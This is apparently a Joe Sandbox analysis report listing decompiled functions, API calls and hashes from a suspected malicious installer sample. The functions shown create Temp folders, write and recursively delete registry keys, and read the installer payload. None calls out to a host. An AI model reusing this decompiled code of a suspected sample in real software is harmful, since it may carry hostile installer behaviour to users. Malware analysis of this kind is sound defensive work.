Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405ba4
0x00405ba8
0x00405bab
0x00405bb1
0x00405bb5
0x00405bb9
0x00405bc1
0x00405bc8
0x00405bce
0x00405bd5
0x00405bdc
0x00405be4
0x00405be6
0x00000000
0x00405be6
0x00405bf0
0x00405bf7
0x00405c0d
0x00000000
0x00000000
0x00000000
0x00405c0f
0x00405c13

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
GetLastError.KERNEL32 ref: 00405BF0
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
GetLastError.KERNEL32 ref: 00405C0F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3355392842
Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
Opcode Fuzzy Hash: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 74251817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E74251817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				void* _t39;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7425506c = _a8;
				 *0x74255070 = _a16;
				 *0x74255074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x74255048, E74251651);
				_push(1); // executed
				_t37 = E74251BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E7425243E(_t54);
					}
					_push(_t54);
					E74252480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E74252655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E74251666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E74252655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E74252655();
							_t37 = GlobalFree(E74251312(E74251654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E74252618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E742515DD( *0x74255068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							_t39 = GlobalFree(_t54); // executed
							return _t39;
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E74252E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E74252B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E74252810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x74251817
0x74251817
0x74251817
0x74251824
0x7425182c
0x74251839
0x74251847
0x7425184a
0x7425184c
0x74251851
0x74251856
0x74251978
0x74251978
0x7425185c
0x74251860
0x74251863
0x74251868
0x74251869
0x7425186a
0x74251870
0x74251876
0x742518a6
0x742518ad
0x742518d1
0x7425191e
0x7425191f
0x742518d3
0x742518d3
0x742518d4
0x742518dd
0x742518de
0x742518e8
0x742518eb
0x742518f0
0x742518f7
0x742518f7
0x742518fd
0x742518fe
0x74251904
0x7425190a
0x74251917
0x74251918
0x7425191b
0x742518af
0x742518af
0x742518b0
0x742518c5
0x742518c5
0x74251929
0x7425192c
0x74251939
0x74251940
0x74251948
0x7425194b
0x7425194b
0x74251948
0x74251958
0x74251960
0x74251965
0x74251958
0x7425196d
0x00000000
0x7425196f
0x74251970
0x00000000
0x74251970
0x7425196d
0x7425187a
0x7425187d
0x7425189b
0x00000000
0x00000000
0x7425189e
0x742518a3
0x742518a3
0x742518a5
0x00000000
0x742518a5
0x7425187f
0x74251880
0x74251888
0x74251889
0x00000000
0x74251889
0x74251882
0x74251883
0x74251891
0x00000000
0x74251891
0x74251886
0x00000000
0x00000000
0x00000000
0x74251886

APIs

Part of subcall function 74251BFF: GlobalFree.KERNEL32(?), ref: 74251E74
Part of subcall function 74251BFF: GlobalFree.KERNEL32(?), ref: 74251E79
Part of subcall function 74251BFF: GlobalFree.KERNEL32(?), ref: 74251E7E

GlobalFree.KERNEL32(00000000), ref: 742518C5
FreeLibrary.KERNEL32(?), ref: 7425194B
GlobalFree.KERNELBASE(00000000), ref: 74251970

Part of subcall function 7425243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7425246F

Part of subcall function 74252810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,74251896,00000000), ref: 742528E0

Part of subcall function 74251666: wsprintfW.USER32 ref: 74251694

Strings

, xrefs: 74251951

Memory Dump Source

Source File: 00000000.00000002.1945649868.0000000074251000.00000020.00000001.01000000.00000004.sdmp, Offset: 74250000, based on PE: true

Associated: 00000000.00000002.1945555867.0000000074250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945760877.0000000074254000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945856765.0000000074256000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74250000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 34a1413138ba303d416d227c401e9536dca3e32fe469c470c80a3cc0d257e82c
Instruction ID: d85706ad69859313f0c34b8adc91a8f08974be9b8158fa6e572990f6692cc170
Opcode Fuzzy Hash: 34a1413138ba303d416d227c401e9536dca3e32fe469c470c80a3cc0d257e82c
Instruction Fuzzy Hash: DF41C572F102429BEB119F24D88CBE5F7ACAF05310F1444E5E9469A0EADB74D7A4CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00403479 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00403479(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x420ef4; // 0x24d7b
				_t34 = _t32 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t10 =  *0x420ef8; // 0x22c00
					_t31 = 0x4000;
					_t11 = _t10 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						_t19 =  *0x420f00; // 0x1425
						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40eb3e
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4; // 0x24d7b
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x0040347c
0x00403489
0x0040349c
0x004034a1
0x004035d1
0x004035d3
0x00000000
0x004035d9
0x004034ad
0x004034c0
0x004034c6
0x004034cc
0x004034d7
0x004034d7
0x004034dc
0x004034e1
0x004034e9
0x004034eb
0x004034eb
0x004034f4
0x004034fb
0x00000000
0x00000000
0x00403501
0x00403507
0x0040350d
0x00000000
0x00403513
0x00403519
0x00403523
0x00403539
0x0040353e
0x00403543
0x00403549
0x0040354f
0x00403559
0x00403560
0x00000000
0x00000000
0x00403562
0x00403568
0x0040356a
0x0040358d
0x00403593
0x00000000
0x00000000
0x00403595
0x00403597
0x00000000
0x00000000
0x00403599
0x00403599
0x004035ac
0x00000000
0x00000000
0x004035bb
0x00000000
0x004035bb
0x00403574
0x0040357b
0x004035c8
0x004035ce
0x004035ce
0x00000000
0x004035ce
0x0040357d
0x00403583
0x00403589
0x00000000
0x00000000
0x00000000
0x004035cc
0x004035cc
0x00000000
0x004035cc
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040348D

Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
SetFilePointer.KERNELBASE(00024D7B,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB

Strings

>@, xrefs: 00403549, 00403562

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: >@
API String ID: 1092082344-3214575836
Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				char _t27;
				int _t30;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
					}
					if(_t37 == 4) {
						_t27 = E00402D84(3);
						_pop(_t32);
						 *0x40b5f8 = _t27;
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024e5
0x004024ea
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x00402515
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse53CA.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse53CA.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse53CA.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nse53CA.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nse53CA.tmp
API String ID: 2655323295-3570211801
Opcode ID: 9c86e53f0ab96bac3dc9ba6bf3699c46313c21c8edda6fdc1e85d5f454bbf74d
Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
Opcode Fuzzy Hash: 9c86e53f0ab96bac3dc9ba6bf3699c46313c21c8edda6fdc1e85d5f454bbf74d
Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658

Uniqueness

Uniqueness Score: -1.00%

Function 0040603F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x0040604b
0x00406056
0x0040605a
0x00406061
0x0040606d
0x0040607d
0x0040607f
0x00406097
0x00406098
0x0040609f
0x004060a0
0x00000000
0x00000000
0x00406083
